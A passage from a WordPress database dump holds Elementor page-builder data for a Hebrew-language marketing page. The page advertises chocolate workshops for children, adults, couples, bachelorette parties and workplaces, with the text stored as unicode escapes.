\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd.<\\/p><p>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8.<br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2332,435,'_elementor_edit_mode','builder'),(2333,435,'_elementor_template_type','wp-page'),(2334,435,'_elementor_version','2.7.5'),(2335,435,'_elementor_pro_version','2.7.3'),(2336,435,'_wp_page_template','elementor_header_footer'),(2337,435,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2338,435,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"align\":\"center\",\"header_size\":\"h1\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":59,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd 